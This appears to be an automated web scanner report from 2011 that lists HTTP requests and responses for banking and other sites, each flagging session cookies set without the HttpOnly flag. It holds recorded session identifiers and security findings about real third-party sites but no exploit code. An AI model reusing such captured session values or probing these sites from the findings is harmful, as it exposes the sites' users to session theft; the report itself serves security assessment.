HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:00:01 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.29 Set-Cookie: JSESSIONID=33F62CE6BCF5B9E517DCE6E5A1E28B7D.fta-web1; Path=/usa_atm Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL', policyref="http://visa.via.infonow.net/w3c/p3p.xml" Content-Language: en-US Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 29339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=puk5wgcWeyj78GP8+NpaJA**; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: visasignature.mobi Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Wed, 02 Feb 2011 22:00:41 GMT Server: Apache Set-Cookie: JSESSIONID=puk5wgcWeyj78GP8+NpaJA**; Path=/ Set-Cookie: emvcc=1; Path=/ Location: http://visasignature.mobi/;jsessionid=puk5wgcWeyj78GP8+NpaJA**?emvcc=0 Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loginout/login.asp HTTP/1.1 Host: www.1sttools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 21:54:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 11382 Content-Type: text/html Set-Cookie: ASPSESSIONIDCARABDDQ=FABHMNIADKMFMMNBNHMMMOCM; path=/ Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RBS_Consumer/SecuredLogin.do HTTP/1.1 Host: www.accessmycardonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:12 GMT Content-type: text/html;charset=iso-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=nyXQNJJQVTn8KD1SsvRkph2vylwYlv0b6WXVqtCWyTfF1WX1dLCL!-1327392406; path=/; secure Cache-Control: no-cache Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /report HTTP/1.1 Host: www.arbornetworks.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /swfaddress/ HTTP/1.1 Host: www.asual.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:45:32 GMT Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny9 with Suhosin-Patch Set-Cookie: JSESSIONID=13FF2143CAF93EAC84619580631ADA51; Path=/ X-UA-Compatible: IE=8 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12534
<!doctype html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="description" content="Creates open source software and provides profes ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 301 Moved permanently Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:06 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Location: https://www4.bankofamerica.com/credit-cards/cardoverview.action?context_id=overview_page Page-Completion-Status: Normal Set-Cookie: CFID=134279852; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=2a1d4a0%2D000380c8%2Dd4d6%2D1d49%2Da7ed%2D83e6bfdd0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Set-Cookie: TRACKING_CODE=; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=3014047403.20480.0000; path=/
<!--i2a business unit tracking code--> <script LANGUAGE="JavaScript" type="text/javascript"> var ic_bu = "credit+cards"; </script>
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /help/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:22 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CFID=132934232; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=4303b0d%2D0003b41a%2Dd4aa%2D1d49%2Da6b8%2D83deedcb0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; expires=Tue, 02-Aug-2011 00:00:00 GMT; path=/; domain=.bankofamerica.com; Set-Cookie: SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN; path=/; domain=.bankofamerica.com; Connection: close Set-Cookie: BIGipServerngen-www.80=3064379051.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /help/equalhousing_popup.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:21 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CFID=132369156; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=17f4331%2D00067587%2Dd4a9%2D1d49%2D9237%2D83a7d3cb0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=1655092907.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.cfm?page=corp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:18 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CFID=131847850; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=18f90e%2D000aada8%2Dd4a6%2D1d49%2D98e7%2D83689ffb0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=430356139.20480.0000; path=/
<tr valign="top">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /weblinking/?referredby=futurescholar HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:33 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CFID=134279832; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=30739eb%2D0002e311%2Dd4b5%2D1d49%2Da7ed%2D83e6bfdd0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=3014047403.20480.0000; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bankofamerica.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Control.do?body=where_passcode_popup HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:48 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000hLN0EFuVu6_KB0QSkbXPq6x:12qb4k4pc; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: ngen_throttle=497; Expires=Mon, 01 Aug 2011 22:04:48 GMT; Path=/; Domain=.bankofamerica.com Set-cookie: hp_beta=B; Expires=Mon, 01 Aug 2011 22:04:48 GMT; Path=/; Domain=.bankofamerica.com Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:48 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /credit-cards/cardoverview.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:02 GMT Content-length: 0 Content-type: text/html Set-Cookie: SMIDENTITY=...[SNIP]...; path=/; domain=.bankofamerica.com; secure Location: https://www.bankofamerica.com/credit-cards/viewall.action?context_id=all_cards Content-language: en-US Set-cookie: JSESSIONID=0000RfDmnLt4u-iNR9enyTATw_C:12qb4kb6q; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /deposits/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:53 GMT Content-length: 0 Location: https://www.bankofamerica.com/global/stateselection.action?returnUrl=https://www.bankofamerica.com/deposits/index.action Content-language: en-US Set-cookie: JSESSIONID=0000sNWjiXby7ONUwh45995dJgv:12qb4k93q; Path=/ Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:52 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /homepage/WidgetAction.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:36:37 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Content-Length: 11 Set-Cookie: JSESSIONID=00003PfGoFif26Fdykwp9gAzvj_:15bvh4s8c; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Via: On-Demand Router/1.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepage/overview.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepage/stateSelect.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hub/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:54 GMT Content-length: 0 Content-type: text/html Location: https://www.bankofamerica.com/ Content-language: en-US Set-cookie: JSESSIONID=00008fBXnMpsDuQjSc8kH5YogBG:12qb4k2ev; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myexpression_banking/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /planning/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:36:25 GMT Content-length: 0 Content-type: text/html Location: https://www5.bankofamerica.com/planning/investments.action Content-language: en-US Set-cookie: JSESSIONID=0000MZoA15Z0qVQ4mcJR1wynojo:12qtmh33l; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /planning/investments.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:32 GMT Content-type: text/html Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache, post-check=0, pre-check=0 Content-language: en-US Set-cookie: JSESSIONID=0000-_A2xQfu_W2uW6lF2fly4Fp:12qb4k2ev; Path=/ Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy/Control.do HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:07 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000mMBXhgo6t8S8rSEKqaClP3F:12qb4k2ev; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:06 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descri ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:05 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000lQoVpN6o_Syjb5ohyReSXTa:12qb4k2ev; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:04 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descri ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
